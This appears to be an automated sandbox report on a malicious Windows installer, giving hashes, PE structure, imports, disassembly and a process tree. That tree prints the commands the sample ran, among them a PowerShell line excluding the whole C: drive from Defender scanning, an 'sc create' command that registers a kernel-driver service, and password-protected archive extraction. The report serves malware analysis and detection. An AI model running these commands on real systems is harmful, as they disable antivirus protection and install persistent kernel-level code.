                                        Encrypted:false
                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                        MD5:9902FA6D39184B87AED7D94A037912D8
                                        SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                        SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                        SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                        Malicious:true
                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:ASCII text, with CRLF, CR line terminators
                                        Category:dropped
                                        Size (bytes):406
                                        Entropy (8bit):5.117520345541057
                                        Encrypted:false
                                        SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                        MD5:9200058492BCA8F9D88B4877F842C148
                                        SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                        SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                        SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                        Malicious:false
                                        Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.921128632410474
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 98.04%
                                        • Inno Setup installer (109748/4) 1.08%
                                        • InstallShield setup (43055/19) 0.42%
                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                        File name:#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                        File size:5'707'417 bytes
                                        MD5:a32b45411fdacb8dc364e2ecc75f7c54
                                        SHA1:a1d3298f2e0ec913d269c8e393ddf49f6cd8fdbc
                                        SHA256:1f20c061d4c41e3e775e80d6aabf5f23d88fbf25923f5821e81b824ef1d1ee46
                                        SHA512:9f353857e6e8871c236c1f04f9f2285aa50a9b697da2c2adcd7a9f1bf6fcd7dcaffdcb111333432366eb709b10ee7108cfaf354c89d203a53d768268e393f195
                                        SSDEEP:98304:XwREri0dWV2OQavkTsvav3PlP4mJ3EANJhSzkYDKjgJdMwZgf:lvdEzQavkTsvafPlAmJ31DSIYCIs
                                        TLSH:1A461213F2CBE43EE0590B3B05B3A15494FB6A11A523AE5696ECB4ECCF311601E3E657
                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                        Icon Hash:0c0c2d33ceec80aa
                                        Entrypoint:0x4a83bc
                                        Entrypoint Section:.itext
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:1
                                        File Version Major:6
                                        File Version Minor:1
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:1
                                        Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                        Instruction
                                        push ebp
                                        mov ebp, esp
                                        add esp, FFFFFFA4h
                                        push ebx
                                        push esi
                                        push edi
                                        xor eax, eax
                                        mov dword ptr [ebp-3Ch], eax
                                        mov dword ptr [ebp-40h], eax
                                        mov dword ptr [ebp-5Ch], eax
                                        mov dword ptr [ebp-30h], eax
                                        mov dword ptr [ebp-38h], eax
                                        mov dword ptr [ebp-34h], eax
                                        mov dword ptr [ebp-2Ch], eax
                                        mov dword ptr [ebp-28h], eax
                                        mov dword ptr [ebp-14h], eax
                                        mov eax, 004A2EBCh
                                        call 00007FBE5CF59D85h
                                        xor eax, eax
                                        push ebp
                                        push 004A8AC1h
                                        push dword ptr fs:[eax]
                                        mov dword ptr fs:[eax], esp
                                        xor edx, edx
                                        push ebp
                                        push 004A8A7Bh
                                        push dword ptr fs:[edx]
                                        mov dword ptr fs:[edx], esp
                                        mov eax, dword ptr [004B0634h]
                                        call 00007FBE5CFEB70Bh
                                        call 00007FBE5CFEB25Eh
                                        lea edx, dword ptr [ebp-14h]
                                        xor eax, eax
                                        call 00007FBE5CFE5F38h
                                        mov edx, dword ptr [ebp-14h]
                                        mov eax, 004B41F4h
                                        call 00007FBE5CF53E33h
                                        push 00000002h
                                        push 00000000h
                                        push 00000001h
                                        mov ecx, dword ptr [004B41F4h]
                                        mov dl, 01h
                                        mov eax, dword ptr [0049CD14h]
                                        call 00007FBE5CFE7263h
                                        mov dword ptr [004B41F8h], eax
                                        xor edx, edx
                                        push ebp
                                        push 004A8A27h
                                        push dword ptr fs:[edx]
                                        mov dword ptr fs:[edx], esp
                                        call 00007FBE5CFEB793h
                                        mov dword ptr [004B4200h], eax
                                        mov eax, dword ptr [004B4200h]
                                        cmp dword ptr [eax+0Ch], 01h
                                        jne 00007FBE5CFF247Ah
                                        mov eax, dword ptr [004B4200h]
                                        mov edx, 00000028h
                                        call 00007FBE5CFE7B58h
                                        mov edx, dword ptr [004B4200h]
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        .rsrc0xcb0000x110000x110005c24f1fdca2aa99f72cdacc12e9a194fFalse0.18787339154411764data3.721333192760738IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                        RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                        RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                        RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                        RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                        RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                        RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                        RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                        RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                        RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                        RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                        RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                        RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                        RT_STRING0xd8e000x3f8data0.3198818897637795
                                        RT_STRING0xd91f80x2dcdata0.36475409836065575
                                        RT_STRING0xd94d40x430data0.40578358208955223
                                        RT_STRING0xd99040x44cdata0.38636363636363635
                                        RT_STRING0xd9d500x2d4data0.39226519337016574
                                        RT_STRING0xda0240xb8data0.6467391304347826
                                        RT_STRING0xda0dc0x9cdata0.6410256410256411
                                        RT_STRING0xda1780x374data0.4230769230769231
                                        RT_STRING0xda4ec0x398data0.3358695652173913
                                        RT_STRING0xda8840x368data0.3795871559633027
                                        RT_STRING0xdabec0x2a4data0.4275147928994083
                                        RT_RCDATA0xdae900x10data1.5
                                        RT_RCDATA0xdaea00x310data0.6173469387755102
                                        RT_RCDATA0xdb1b00x2cdata1.1590909090909092
                                        RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                                        RT_VERSION0xdb2980x584dataEnglishUnited States0.2804532577903683
                                        RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                        DLLImport
                                        kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                        comctl32.dllInitCommonControls
                                        user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                        oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                        advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                        NameOrdinalAddress
                                        __dbk_fcall_wrapper20x40fc10
                                        dbkFCallWrapperAddr10x4b063c
                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States
                                        No network behavior found

                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:01:40:29
                                        Start date:23/12/2024
                                        Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe"
                                        Imagebase:0x430000
                                        File size:5'707'417 bytes
                                        MD5 hash:A32B45411FDACB8DC364E2ECC75F7C54
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Reputation:low
                                        Has exited:true

                                        Target ID:1
                                        Start time:01:40:29
                                        Start date:23/12/2024
                                        Path:C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$2044E,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe"
                                        Imagebase:0xa50000
                                        File size:3'366'912 bytes
                                        MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:01:40:30
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:01:40:30
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:01:40:30
                                        Start date:23/12/2024
                                        Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
                                        Imagebase:0x430000
                                        File size:5'707'417 bytes
                                        MD5 hash:A32B45411FDACB8DC364E2ECC75F7C54
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Reputation:low
                                        Has exited:false

                                        Target ID:5
                                        Start time:01:40:31
                                        Start date:23/12/2024
                                        Path:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$6047A,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
                                        Imagebase:0x10000
                                        File size:3'366'912 bytes
                                        MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Reputation:low
                                        Has exited:true

                                        Target ID:6
                                        Start time:01:40:34
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:01:40:34
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:01:40:34
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:01:40:34
                                        Start date:23/12/2024
                                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                        Wow64 process (32bit):true
                                        Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                        Imagebase:0xc70000
                                        File size:831'200 bytes
                                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        • Detection: 0%, Virustotal, Browse
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:10
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:11
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                        Wow64 process (32bit):true
                                        Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                        Imagebase:0xc70000
                                        File size:831'200 bytes
                                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:12
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:13
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:14
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:15
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:16
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:17
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:18
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:19
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                        Imagebase:0x7ff693ab0000
                                        File size:496'640 bytes
                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:20
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:21
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:22
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:23
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:24
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:25
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:26
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:27
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
